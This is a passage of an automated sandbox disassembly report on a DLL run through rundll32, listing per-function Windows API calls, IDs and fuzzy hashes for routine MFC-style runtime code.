                                                                                                          • API String ID: 577375395-3145022300
                                                                                                          • Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
                                                                                                          • Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10023423
                                                                                                          • FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 1002345E
                                                                                                            • Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C
                                                                                                          • LockResource.KERNEL32(?,00000024,1000150C,00000000,00FD6546), ref: 1002346F
                                                                                                          • GetDesktopWindow.USER32 ref: 100234A2
                                                                                                          • IsWindowEnabled.USER32(?), ref: 100234B0
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 100234BF
                                                                                                            • Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,00FD6546), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,00FD6546), ref: 100235D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 964565984-0
                                                                                                          • Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
                                                                                                          • Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                                                                                          • String ID: AfxOldWndProc423
                                                                                                          • API String ID: 2109165785-1060338832
                                                                                                          • Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
                                                                                                          • Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetStockObject.GDI32(00000011), ref: 1002B9C8
                                                                                                          • GetStockObject.GDI32(0000000D), ref: 1002B9D0
                                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
                                                                                                          • GetDC.USER32(00000000), ref: 1002B9EC
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
                                                                                                          • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
                                                                                                          • ReleaseDC.USER32 ref: 1002BA18
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                          • String ID: System
                                                                                                          • API String ID: 46613423-3470857405
                                                                                                          • Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
                                                                                                          • Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3697954797-0
                                                                                                          • Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
                                                                                                          • Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AF72
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,1002B13B,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461), ref: 1002AF83
                                                                                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002AFA1
                                                                                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AFD5
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1891723912-0
                                                                                                          • Opcode ID: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                                                                                                          • Instruction ID: 31172aa3a9d6c7229b9057958b552749f74c39a7ca69aeefdb4b4ffe67e485c6
                                                                                                          • Opcode Fuzzy Hash: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                                                                                                          • Instruction Fuzzy Hash: 2431BCB4400A16EFDB25DF64ECC5C5ABBB4FF05310BA1C529E96A97661CB30AD90CF80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10001982
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                          • Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
                                                                                                          • Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                            • Part of subcall function 10021E9F: GetParent.USER32(00000000), ref: 10021EF3
                                                                                                            • Part of subcall function 10021E9F: GetLastActivePopup.USER32(00000000), ref: 10021F04
                                                                                                            • Part of subcall function 10021E9F: IsWindowEnabled.USER32(00000000), ref: 10021F18
                                                                                                            • Part of subcall function 10021E9F: EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10021F9E
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 10021FB2
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 10021FBC
                                                                                                          • SendMessageA.USER32 ref: 10021FD4
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002204E
                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 10022093
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1877664794-4108050209
                                                                                                          • Opcode ID: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                                                                                                          • Instruction ID: c7e4dcc29fd9e1fd486e00497d35318e62f13d9d594050e36cf698265b5585c7
                                                                                                          • Opcode Fuzzy Hash: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                                                                                                          • Instruction Fuzzy Hash: 7B41EF75A00228ABEB21CF64DC86BDA77B8FF14750F900599FA58D7281D7B09E80CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002104C
                                                                                                          • lstrcmpA.KERNEL32(?,?), ref: 10021058
                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
                                                                                                          • GlobalLock.KERNEL32 ref: 1002109C
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1
                                                                                                            • Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
                                                                                                            • Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
                                                                                                            • Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 168474834-0
                                                                                                          • Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
                                                                                                          • Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A99D
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9A4
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9AB
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9B5
                                                                                                          • GetDC.USER32(00000000), ref: 1002A9BF
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
                                                                                                          • ReleaseDC.USER32 ref: 1002A9E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1151147025-0
                                                                                                          • Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
                                                                                                          • Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen$IconLoad_memset
                                                                                                          • String ID: ^t$127.0.0.1
                                                                                                          • API String ID: 858515944-3506571716
                                                                                                          • Opcode ID: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
                                                                                                          • Instruction ID: cb70d14c711791ee52ee588ee2f9325bb7e7fa3515ba92e26f588566a221a80e
                                                                                                          • Opcode Fuzzy Hash: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
                                                                                                          • Instruction Fuzzy Hash: AE5118B4904298DBDB14CFA4CC41B9EBBB1EF45308F6481A8E50DAB392DB356E85CF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002B878
                                                                                                          • lstrlenA.KERNEL32(?), ref: 1002B8C3
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
                                                                                                          • _wcslen.LIBCMT ref: 1002B901
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                                                                                                          • String ID: System
                                                                                                          • API String ID: 4253822919-3470857405
                                                                                                          • Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
                                                                                                          • Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                          • String ID:
                                                                                                          • API String ID: 2853195852-0
                                                                                                          • Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
                                                                                                          • Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend_memset
                                                                                                          • String ID: ,
                                                                                                          • API String ID: 2997958587-3772416878
                                                                                                          • Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
                                                                                                          • Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10022468
                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002258B
                                                                                                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
